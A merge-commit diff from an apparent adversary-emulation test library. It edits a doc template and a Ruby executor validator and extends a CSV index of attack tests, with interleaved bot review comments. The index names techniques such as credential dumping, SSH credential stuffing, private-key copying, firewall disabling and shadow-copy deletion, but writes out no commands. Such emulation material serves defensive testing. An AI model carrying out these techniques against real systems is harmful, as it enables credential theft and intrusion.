Merge branch 'master' into pr-passwordspraying-azure

This commit is contained in:
piaconsigny
2021-07-02 09:49:07 -07:00
committed by GitHub
295 changed files with 6853 additions and 1019 deletions
@@ -24,3 +24,6 @@ docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
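Review bot: The `*.creds` pattern on L15 only keeps not-yet-tracked files with that exact suffix out of an ordinary `git add`; it does nothing for a credential file that is already tracked, one staged with `git add -f`, or credential output written under another name or extension, so it should not be read as a guard against secrets reaching the repository. Since the branch name suggests this is arriving with password-spraying tests, it is worth stating in the comment what produces these files and that the pattern is a convenience rather than a control, e.g. `# Credential files written locally by tests; never commit these (gitignore does not cover already-tracked files)`. A pre-commit secret scan, if the project has one, is the place to enforce it.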
@@ -34,7 +34,7 @@ See: https://atomicredteam.io
## Having trouble?
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link))
## Getting Started
@@ -25,13 +25,17 @@
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -75,7 +79,7 @@ end%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
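Review bot: `cleanup` on L29-L31 escapes only backslashes, yet its result is placed into a markdown table row on L38, where a literal `|` in a description or default value would split the cell and corrupt the rendered table; escaping the pipe as well, `input.to_s.strip.gsub(/\\/,"&#92;").gsub('|','&#124;')`, keeps the row intact. A newline inside a value would break the row in the same way and is not handled either. If these values come from the repository's own YAML, as the `test['input_arguments']` access suggests, this is a rendering defect rather than an injection concern, but a one-line comment above `cleanup` saying what it escapes and why (markdown table cell safety) would stop the next person from assuming it is a general HTML escape. The second hunk at L43-L44 appears to differ only in whitespace.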
@@ -142,7 +142,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud'
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
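Review bot: The executor whitelist is now spelled out twice, once in `valid_executor_types` on L54 and again in the `when` list on L62, and this commit had to touch both to add `kubectl`; deriving the `when` list from the array, `when *(valid_executor_types - ['manual'])`, keeps the two from drifting apart. Separately, the regex on L52 (`/[a-z_]+/`) is unanchored, so a name such as `PowerShell` passes the "lowercased and underscored" check because it contains one lowercase run; anchoring it as `/\A[a-z_]+\z/` enforces what the error message promises. The enclosing method starts before and continues after both hunks, so how `valid_executor_types` is consumed further down is not visible here.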
@@ -115,7 +115,7 @@ atomic_tests:
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
@@ -5,12 +5,16 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -62,6 +66,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -192,6 +198,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
@@ -265,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -318,7 +326,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -353,9 +361,12 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -481,6 +492,8 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -499,6 +512,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -565,6 +579,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -587,6 +602,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -788,6 +804,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
@@ -815,6 +832,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -836,6 +854,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
5 credential-access T1552.007 Container API 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
6 credential-access T1552.007 Container API 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
7 credential-access T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
8 credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
9 credential-access T1110.004 Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
10 credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
11 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
12 credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
13 credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
14 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
15 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
16 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
17 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
18 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
19 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
20 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
66 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
67 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
68 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
69 credential-access T1003.007 Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
70 credential-access T1003.007 Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
71 credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
72 credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
73 credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
198 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
199 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
200 privilege-escalation T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
201 privilege-escalation T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
202 privilege-escalation T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
203 privilege-escalation T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
204 privilege-escalation T1134.001 Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
272 defense-evasion T1562.002 Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
273 defense-evasion T1562.004 Disable or Modify System Firewall 1 Disable firewall 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 sh
274 defense-evasion T1562.004 Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
275 defense-evasion T1562.004 Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall Disable Microsoft Defender Firewall via Registry d9841bf8-f161-4c73-81e9-fd773a5ff8c1 afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
276 defense-evasion T1562.004 Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN Allow SMB and RDP on Microsoft Defender Firewall 15e57006-79dd-46df-9bf9-31bc24fb5a80 d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
277 defense-evasion T1562.004 Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile Opening ports for proxy - HARDRAIN 9636dd6e-7599-40d2-8eee-ac16434f35ed 15e57006-79dd-46df-9bf9-31bc24fb5a80 powershell command_prompt
278 defense-evasion T1562.004 Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location Open a local port through Windows Firewall to any profile 6f5822d2-d38d-4f48-9bfc-916607ff6b8c 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
279 defense-evasion T1562.004 Disable or Modify System Firewall 7 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
280 defense-evasion T1562.001 Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
281 defense-evasion T1562.001 Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
282 defense-evasion T1562.001 Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
326 defense-evasion T1564.002 Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
327 defense-evasion T1564.003 Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
328 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
329 defense-evasion T1564 Hide Artifacts 2 Create a user called "$" as noted here Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
330 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
331 defense-evasion T1562.003 Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
332 defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
361 defense-evasion T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
362 defense-evasion T1127.001 MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
363 defense-evasion T1127.001 MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
364 defense-evasion T1553.005 Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
